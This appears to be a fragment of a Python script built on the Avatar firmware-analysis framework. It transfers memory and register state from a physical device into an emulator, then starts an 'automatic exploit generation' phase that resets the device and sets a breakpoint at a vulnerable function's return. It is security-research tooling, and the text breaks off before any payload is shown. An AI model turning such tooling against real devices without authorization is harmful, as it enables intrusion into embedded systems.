Esempio n. 1
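# Memory region copied from the physical target into the emulator before
# emulation resumes. Named once here so the range is adjusted in a single
# place; 0x20000000 is presumably the device's SRAM base (confirm against the
# target's memory map before changing either value).
STATE_TRANSFER_BASE = 0x20000000
STATE_TRANSFER_SIZE = 0x00001000

print("AVATAR: Transferring state from target to emulator")
# Memory is copied before the CPU state, following the original sequence —
# presumably so the emulator already holds the target's memory image when the
# register state (PC/SP) is applied.
transfer_mem_to_emulator(avatar, STATE_TRANSFER_BASE, STATE_TRANSFER_SIZE)
print("AVATAR: Memory transfer complete")
transfer_cpu_state_to_emulator(avatar)
print("AVATAR: Register transfer complete")

print("AVATAR: Continuing emulation")
avatar.get_emulator().cont()

print("AVATAR: Completed firmware analysis")

print("Press enter to begin exploit generation")

# Blocks until the operator presses enter; the typed text is bound to
# `keyboard` only so the name stays defined for any later reference.
keyboard = input()

avatar.stop()

print("EXPLOIT: Beginning automatic exploit generation")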

# This section runs in two threads, since concurrency matters here:
# one thread manages the target device, and the other generates
# and sends an exploit to the device.
# Many sleeps had to be inserted because we are dealing with slow hardware.

def device_thread ():
    print("EXPLOIT: Resetting device...")
    cmd = OpenocdTarget(hwmon.get_telnet_jigsock())
    time.sleep (3)
    cmd.halt ()
    # Remove the old breakpoint, and set a new one at the "ret" instruction
    # of the vulnerable function